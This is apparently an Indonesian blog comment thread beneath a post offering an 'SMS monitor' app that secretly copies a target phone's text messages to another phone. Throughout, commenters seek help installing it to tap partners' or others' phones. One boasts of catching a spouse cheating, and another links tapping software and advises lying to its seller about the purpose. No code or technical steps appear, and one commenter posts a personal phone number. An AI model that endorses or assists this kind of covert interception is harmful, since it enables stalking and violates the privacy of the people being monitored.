rico nii pada 08:23 AM, 21-Feb-12

software ini cacat sob,, sms yg k forward dr HP target k HP sendiri , d forward lg k HP target, jd langsung ketawan ama target klo HP nya di sadap.

irfanS60V3 pada 11:59 AM, 26-Feb-12

akhirnya humairoh ane ketauan selingkuh....
Makasih mas rian

dolly pada 04:57 PM, 16-Mar-12

klo d pke di malaysia bisa g?

madie dodoel pada 10:31 PM, 20-Mar-12

kenapa ya hp nokia N73 ngk bisa instal, laporanya file rusak . . ?

parto pandi pada 10:13 PM, 28-Mar-12

mas bro ug no q(penyadap) gk dpt sms apa2 tu dr pnsel yg ak sadap?
Smua lgkah udh ak lakuin kyk pnduan diatas.
Gmn mas bro solusi nya???

zacky pada 08:18 AM, 05-Apr-12

boz boz.. Gawat nih.... Aq gk bisa menonaktifkan nie app... Gmn crax boz??

parto pandi pada 12:45 PM, 12-Apr-12

ap klo hp nya dh dsadap trs hp nya di gnti no,ap msh bs kesadap boz?

ari_w pada 06:39 PM, 17-Apr-12

agan yang baik hati mau nanya knapa hp n5800 punya saya bisa di instal app sms monitor tapi kok ndak bisa d aktifkan y.... mohon petunjuk

cut nanda pada 10:09 AM, 05-May-12

di mana harus aq download aplikasi nya?
Terlalu rumit..

Rey pada 07:58 AM, 07-May-12

Mas klu kita ngehek pake pc . . Bgi mana caranya . Sya coba kenapa setiap d instal aplikasi sms monitor tersebut harus masuk ke lanyanan internet pa mksd'a .? apa kah d ponsel kita atau penyadap d instal aplikasi lainnya sya menggunakan n73 sebgi admin. Plis sya minta petunjuk'a . . ! To email !

Rey pada 08:01 AM, 07-May-12

Mas klu kita ngehek pake pc . . Bgi mana caranya . Sya coba kenapa setiap d instal aplikasi sms monitor tersebut harus masuk ke lanyanan internet pa mksd'a .? apa kah d ponsel kita atau penyadap d instal aplikasi lainnya sya menggunakan n73 sebgi admin. Plis sya minta petunjuk'a . . ! To email !

Rey pada 08:08 AM, 07-May-12

Trus minta petunjuknya mas. . ! End kode" atu rumus untuk pengturan di dalam aplikasi trersebut.

julian pada 09:30 PM, 18-May-12

aplikasi ini ada masa aktifny gak gan..??
trimakasih..

risman zhodel pada 08:14 PM, 29-May-12

bosss aq udah donlot aplikasix trus z sdah kirim set admin ke hp target,,,,tpi tdk berjalan jln,,,,bgmnaa itu boz?mhon ksi cara untuk mngaktifkn aplikasix.

faridayid pada 07:15 PM, 20-Jun-12

assalamualaikum....saya dari Malaysia...ingin minta kebenaran untuk download file ini...boleh ngga saya gunanya di Malaysia?
Jika boleh,bagaimana cara untuk memasukkan nombor saya.?(mohon bantuan)

risman pada 09:11 PM, 02-Jul-12

gmnaa cara ofx aku ngak ngerti cara of yg di atas?

unyil anak kecil pada 04:09 PM, 17-Jul-12

ehmm.. Sayangnnya ane ga punya pacar gan smile

Iman Hijrah Dan Jihad MyWapBlog.com pada 05:40 PM, 28-Jul-12

keren Bro.. Ane dunlut dulu ah..

Chilofet pada 09:19 PM, 28-Jul-12

tolong di bnerin lg appnya. masih kelihat di log

my name is Mirza pada 12:32 PM, 23-Sep-12

mas di instal di n70 bisa apa ga?

FaqihDeath pada 11:35 PM, 04-Nov-12

hahahhaa mnynangkan skli master.....
Mksh y....

Dtnggu kunbal.a master...smile

totong tasbih pada 12:40 AM, 20-Nov-12

mas mohon pencerahannya.....: memang sms monitor bisa sadap sms masuk di nokia c6(yg disadap) ke nokia 5800(penyadap).....tp kenapa sms KELUAENYA dari c6 itu gk BISA KESADAP....??? MOHON PENCERAHANNYA mAS.....THANKS...

Rangga pada 08:12 PM, 07-Mar-13

gan ane mau berhenti caranya gmn???pke yang off ga bisa2..tolong d bantu..!!!
Mksh

rijal pada 11:46 AM, 12-Mar-13

maap nie mas ganggu
yg jadi pertanyaan saya ini
hp target kan sms knmr orang y tapi masuk nya knmr ane.....
Tpi k nmr yg d tuju masuk ngga sms nya?

movin7x pada 02:30 PM, 19-Mar-13

Gan.. hp yg pengen gue sadap symbian belle, bisa nggak gan?

movin7x pada 02:30 PM, 19-Mar-13

Gan.. hp yg pengen gue sadap symbian belle, bisa nggak gan?

bule pada 06:30 AM, 30-Apr-13

unable to install .
Aduhh pusing jadinya udh bbrp x msh ajh gth !!!
Jadi gmn ni jalan kluarnya ?

GUVRON PRAMANA ADITIA PUTTRA pada 11:18 PM, 12-Jun-13

muantaf s?

suliadi pada 07:45 PM, 06-Jul-13

makasih bosss udah aku coba sukses... tapi cuma sehari .pertaannya klo hpnya dimatiin trus dihidupin lagi apa masih bekerja app nya? soale punyaku cuma bekerja 1 hari .trima kasih. klo boleh minta nmr hpnya sms aku di 081555983924

suliadi pada 12:30 PM, 20-Aug-13

Maaf mas ini mo tanya mo berhenti sementara kok gak bisa aku sudah pakai cara off tak kirim ke hp tyarget tapi masih terkirim juga ke aku, trus aku pake( off 08xxx nomorku)aku kirim ke hp target eh masih ngirim juga ke aku gimana cara berhentinya??? Nanti jawabannya sms aja Di nomor saya 081555983924 trima kasih

bonex pada 02:04 AM, 02-Oct-13

nih gan ane coba ndiri softwere e gan www.penyadapphone.blogspot.com kalo ditanye ama admin nya jangan bilan lo gan buat nyadap orang!!!! bilang buat antisipasi hp ilang gan.. selamat mencoba gan

ardan pada 03:04 PM, 09-Oct-13

sadap sms ini klo target ganti nomer kartu tp g tau nomer tersebut trus gmn bos,ada aplikasi yg lain g??

dian andika pada 04:04 PM, 10-Oct-13

bngung aku cra mnggunakan nya gmna.
tlng ksih tau lah cra mnggunakan nya yg gmpang.... sad smile

aulia pada 09:59 AM, 11-Nov-13

bisa untuk nokia c3 ngga mas ryan?

Dhitzu pada 11:05 PM, 17-Dec-13

Gan, app sms monitor'y sdh ad kendala lg gan...
Sms terkirim yg ane kirim ke hp korban hilang bgtu sja gan

zoel tika pada 04:44 AM, 15-Jan-14

suka aplikasinya

yondaimealexs pada 08:54 PM, 15-Mar-14

caranya emg sngat mnarik gan vi syangx pacar Q trllu jauh dr kota itupun Q gk tau yg jlas klo mau pinjam hp pacar btuh alasan yg tpat dgn bla bla.. biggrin msti gtu hrus di hack dlu hp pacar.. biggrin !!

Langganan komentar: [RSS] [Atom]

Komentar Baru

[Masuk]
Nama:

Email:

Komentar:
(Beberapa Tag BBCode diperbolehkan)

Kode Keamanan:
Aktifkan Gambar


 
Kembali ke Atas